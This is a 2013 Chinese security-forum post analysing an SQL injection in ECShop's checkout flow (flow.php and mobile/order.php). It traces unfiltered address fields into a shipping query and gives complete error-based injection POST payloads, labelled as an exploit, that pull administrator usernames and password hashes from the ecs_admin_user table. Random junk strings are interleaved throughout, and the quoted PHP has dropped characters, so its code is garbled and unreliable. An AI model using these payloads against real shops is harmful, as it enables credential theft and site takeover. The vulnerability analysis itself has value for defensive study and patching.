中国网络渗透测试联盟

标题: ecshop全版本注入分析 [打印本页]

---

作者: admin    时间: 2013-1-13 09:48
标题: ecshop全版本注入分析
前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
5 e+ o! b% e6 b# R5 t- u: l0 r
# ]7 i2 d% R& ]( I$ a    漏洞关键文件：

    /includes/lib_order.php
% [0 X% ]2 x- y+ `3 J
' T8 i6 ?% O. P& P, J    关键函数：
# L3 ~4 }8 c  m- O3 a


, v0 d, I) Y6 N9 M  D  p01     function available_shipping_list($region_id_list)

02 {

# y$ |+ f: I+ V03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

6 |& u4 t$ q6 U$ \, x05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

( B' }) G4 J7 Q, a06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
& B! l2 O& @9 j1 w6 B
# J7 A+ U/ ]7 B& r07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
. D! a7 s, q: A7 Q- @* \2 _2 m
08             'WHERE r.region_id ' . db_create_in($region_id_list) .

09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
9 U. A/ _% C; g- ^+ X, Y6 s; i6 ?
4 X% S( Z/ E# S9 u9 N2 Q10   
$ N4 s  W$ I8 ^" x
& j# j! d9 g& j" p- x11     return $GLOBALS['db']->getAll($sql);

3 f* x9 }3 d9 E. K5 t. a- t12 }
. Q( P6 A1 ?- I0 z2 d
9 d& J4 D% T5 h3 x+ L显然对传入的参数没有任何过滤就带入了查询语句。

下面我们追踪这个函数在flow.php中：
  q- |+ N/ T9 d 第531行：   

$ V$ N$ w5 y5 R2 w1 e. Y1 $shipping_list     = available_shipping_list($region);



6 B  T; _4 j" J# o" N: d% ]' S

9 b' G) S6 b- f再对传入变量进行追踪：
% t* D2 p- l, Y2 ^% }1 p- D
第530行：   
$ ]/ l/ j# x' }* W
5 T$ x4 q; Y3 s1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);

& g( N9 c$ @& v: f; w4 ~4 C


( l% ^. ]: }9 B0 ^3 y3 U
9 j; ^& B* _; A4 y7 r第473行：        
( }1 ]) `$ E, y" C
+ N- G. G, U9 N# Q, ?$ h1 $consignee = get_consignee($_SESSION['user_id']);
* l) T9 |7 K+ t6 y' |2 q
到了一个关键函数：

8 S6 _2 W% D" z3 l5 @- V# |9 w/includes/lib_order.php

, s( y* h" g- ~! r' I5 C
5 V$ F! G; b$ c9 Z- m: i
& W* F4 F4 p1 b& i- o
# |* m$ e6 w- n7 V6 u* w/ R2 r0 z
5 O( Z. ~. Q, @  W0 I$ m01 function get_consignee($user_id)

02 {

03     if (isset($_SESSION['flow_consignee']))
0 T! x) G. O; n) ~  u3 S
, l- e/ @% ~( Q5 p04     {
9 E5 b. C6 F$ U0 _" s$ f0 E% y
7 W3 T' t  |0 w- P, a0 o! o05         /* 如果存在session，则直接返回session中的收货人信息 */
& T: n4 v& S, C- d, \% l% ^9 C  w& @
06   

07         return $_SESSION['flow_consignee'];
% r2 d( {, n. _/ D/ B2 \" A
. R* c2 Q% S7 m+ X, C1 W* j  I08     }

09     else

4 D/ O! Y- l6 f1 A7 C. \' i10     {

11         /* 如果不存在，则取得用户的默认收货人信息 */
+ P- ~8 ?4 U8 i1 C: q6 d
12         $arr = array();

" _6 b/ a6 a1 C# g# j5 x5 ?13   
/ _. r6 z& E/ U
+ g3 D5 U- M( K# Y) c9 T4 H( B14         if ($user_id > 0)

15         {
6 q+ V+ N9 I1 E' G3 A8 D
/ `3 B; r% }/ J5 {& A8 D2 ?16             /* 取默认地址 */
) ?: p" V% D* P' g' Y, Z* t
7 F+ x8 {2 z, q" r: ~17             $sql = "SELECT ua.*".
4 Y9 ?) y3 a1 x1 S& z2 i; `
" l) Q& j' U$ M3 p* G18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
; o' ]  ]! m% ^3 j
19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
5 m. `" P$ _4 c4 }4 X6 V
20   
" N0 j: t/ [  W7 J7 r
5 n+ o5 J3 x* I) C5 c/ c21             $arr = $GLOBALS['db']->getRow($sql);
" q# p. l% ]+ L" U) c6 O
& n7 x) ~( X1 W6 _, a# o22         }
1 o6 ], B6 D+ W4 z" f
23   

24         return $arr;

25     }

26 }

显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？

1 h" W! u# W4 w0 G
( T. j9 ]3 L% j: }' \% m1 t. Z9 ~
( }' ^2 q' \, t- {/ v3 q关键点:

第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
9 p6 T; R$ d: {, e' Q4 H, V. H
4 L  U' M9 y& L. a/ ^! \  A' a这里对传入参数反转义存入$_SESSION中。


3 w% Z2 |  l" l2 @: L5 n8 ^6 t$ j
然后看下：


0 ?6 Q4 r* g3 r3 h/ M
: g3 `+ {) h/ F) E+ O% t- Y/ {   

01 $consignee = array(
# J8 V( P, O1 b0 g
. [4 r5 Q$ Q3 S8 K2 Q02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),

9 r/ t# S+ O( b3 A. i, s* F9 ^6 T* h03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
. v+ T$ [7 s+ j8 h& O! m6 j
04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
7 b* C0 }, @) X. [
05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

$ E( [4 j0 n- n8 r; I06         'city'          => empty($_POST['city'])       ? '' _POST['city'],

07         'district'      => empty($_POST['district'])   ? '' _POST['district'],

08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

09         'address'       => empty($_POST['address'])    ? '' _POST['address'],

, J6 e6 z$ k9 N8 }10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
9 Z' i& w& I9 J
11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

% v: ]; R: P8 p- V% s7 w12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
  W' K0 R+ M$ u( G& p' A% J# n; I
; U* @" Q$ L; L, J$ D+ R6 A14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
  v# F- e' A3 y2 M0 W1 g$ C
) `- \0 N: g0 B# s3 ]% Q' I15     );

好了注入就这样出现了。

==================

注入测试：

, @2 H; W/ d$ {- |2 o8 C2 R环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
. G/ H7 l: f9 |( E. W7 h
$ Q5 |3 c0 g; W测试程序：ECShop_V2.7.3_UTF8_release1106


! X, n" S) y4 w# `! S  Q
+ K4 ~! U  N! k/ S$ E. X2 r1.首先需要点击一个商品加入购物车
6 @- m" p: n  I+ m5 D
2.注册一个会员帐号

$ D, C) L$ @! L9 K) P$ x3.post提交数据


  U; G8 h& W  Q, P" v. U) Z) y$ Z$ g
1 http://127.0.0.1/ecshop/flow.php
  @6 I* o9 w( g% k; D& L; M3 T
3 [6 l. l( ?; R) Z2 X# E7 C2   
9 F, y) P8 @0 s/ d! t5 }& [
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
8 k% W: S! e" W4 \7 x举一反三，我们根据这个漏洞我们可以继续深入挖掘：

我们搜寻关键函数function available_shipping_list()

* ~9 @. \2 C! ^# d, `" }在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

利用exp:

1.点击一个商品，点击购买商标
( u4 W2 U% J7 N. N
) j* Q$ t; p. m4 X/ G4 K0 p2.登录会员帐号

3.post提交：

! \3 c7 R- F- Q2 i, Dhttp://127.0.0.1/ecshop/mobile/order.php
& b6 k. d0 m! J* w) M! \4 N( Z
7 r" U" a3 y1 n, x

country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=
1 A6 C( D- `- |+ f& k/ g5 F) Y* k$ t5 ~

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2